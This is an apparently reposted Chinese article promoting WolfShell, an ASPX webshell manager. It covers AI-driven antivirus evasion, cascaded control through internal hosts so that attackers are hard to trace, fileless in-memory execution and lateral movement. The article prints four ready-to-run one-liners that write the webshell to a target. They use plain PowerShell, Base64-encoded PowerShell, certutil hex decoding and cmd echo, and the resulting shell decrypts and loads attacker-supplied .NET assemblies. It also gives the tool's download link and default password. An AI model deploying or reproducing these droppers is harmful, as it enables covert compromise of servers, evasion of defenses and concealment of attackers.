AI与ASPX渗透实战：金刚狼WebShell级联控制与深度免杀管理工具解析

工具介绍

金刚狼是一款专为 ASPX 环境设计的高级 WebShell 管理工具，为安全研究人员和渗透测试人员提供强大的命令执行、提权和内网穿透能力。它集成了大量渗透工具，支持内存加载无文件落地操作，可实现高隐蔽性的内网渗透。

功能介绍

自定义 .NET 程序执行

.NET 程序执行支持在内存中直接加载并运行自定义的 .NET 程序集，这能让你在渗透测试中快速扩展后渗透能力。

AI 人工智能

利用 AI 技术对金刚狼 WebShell 的服务端代码进行免杀处理，极大地提高了攻击载荷的生存能力。

级联内网第3层 WebShell 执行 Cmd 命令

通过入口点 192.168.50.106 先级联到内网 192.168.50.159，再进一步级联至更深一层的 192.168.50.69 WebShell 并执行命令。

有个典型的渗透场景是：当你控制了数台服务器作为跳板机，而真正的目标恰好藏在第三层内网。此时，利用这种级联控制就能有效隐藏你的真实 IP，让溯源变得极其困难。

级联内网第2层 WebShell 执行 Cmd 命令

借助入口点 192.168.50.159，直接级联控制内网主机 192.168.50.106 上的 WebShell 并执行命令。

WebShell 入口点执行 Cmd 命令

最基本的使用方式：直接与 WebShell 入口点交互，在目标服务器上执行系统命令，查看当前用户及网络信息。

WebShell 入口点执行 PowerShell 命令/代码

• whoami 指令基于纯代码实现，不依赖系统自带的同名工具。
• 同时支持命令执行与代码执行，单次载荷长度可达 9K。
• 输入 info 或 ver 就能快速查看到操作系统版本、位数、.NET 版本以及 PowerShell 版本等详细信息。
• 输入 whoami 或 username，工具会自动将其转换为对应的 PowerShell 代码来查询当前用户信息。
• 支持 Base64 编码的代码执行，例如：base64:ZWNobyBXb2xmU2hlbGw=。

PS C:\Users\admin>whoami
whoami: IIS APPPOOL\DefaultAppPool
Username: WIN-021V7TK43N5$

PS C:\Users\admin>info
Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
Version Number: 10.0.17763

PowerShell Version: 5.1.17763.1

.NET Detailed Versions:
PSChildName Version   Release
----------- -------   -------
Client      4.7.03190 461814

PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=
WolfShell

PS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"
Current User: WIN-021V7TK43N5$

文件管理

提供图形化的文件管理功能，方便你对服务器上的网站目录（如 C:\inetpub\wwwroot）执行浏览、新建文件夹或上传等操作。

核心优势

• AI 驱动渗透：支持通过自然语言直接与 AI 交互，指挥 WebShell 执行复杂的渗透任务。
• AI 辅助免杀：接入人工智能模型，通过交互式对话就能完成对 WebShell 代码的混淆与免杀。
• 高效隐蔽的通信：采用二进制流传输协议，确保通信的高效性与隐蔽性。
• 端到端安全加密：所有传输的 Payload 均受 AES 加密保护，且每次通信都使用随机密钥，保障数据安全。
• 无痕运行：支持直接在内存中加载并执行代码，最大程度避免在磁盘留下痕迹，显著提升操作隐蔽性。
• 内网级联控制：通过已控制的 WebShell，无需额外部署代理或配置端口转发，即可连接并控制更深层内网环境中的其他 WebShell。
• 后渗透工具集成：通过已控的 WebShell 在内存中加载各类渗透工具，无需代理或端口转发，即可便捷高效地实施内网横向移动。
• 多语言特征：服务端及 Payload 均为纯英文，而提供的 WebShell 变种文件则包含了英文、日文、韩文。

使用介绍

安装指南

1. 下载 WolfShell

   git clone https://github.com/0x7556/wolfshell.git

2. 配置环境

   • 确保目标环境支持 ASPX 与 ASHX 并已正确配置。

3. 上传 WolfShell

   • 将 WolfShell 文件上传到目标服务器，支持 ASPX、ASHX、内存马三种类型。
   • WebShell 脚本地址：https://github.com/0x7556/wolfshell/tree/main/shell

4. 访问 WebShell

   • 通过工具客户端连接 WebShell，默认密码为 WolfShell。如需修改密码，可使用工具提供的 WolfHash 进行加密。

使用环境

• 操作系统：Windows
• .NET 版本：.NET Framework 4.8

命令 | 漏洞 GetShell

当目标具备命令执行条件时，你可以通过以下四种方法之一写入金刚狼 WebShell。

PowerShell 写入 wolf.aspx

powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"

PowerShell 命令 Base64 写入 wolf.aspx

powershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA==

cmd 命令 echo & certutil 写入 wolf.aspx

echo 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hex

cmd 命令 echo 写入 wolf.aspx

echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx

在该项目的开源仓库中，你可以找到相关代码和更多实战用例：https://github.com/0x7556/wolfshell 。如果你对更深度的攻防技术感兴趣，欢迎常来 云栈社区 一起交流学习。

文章转自菜鸟学信安，侵删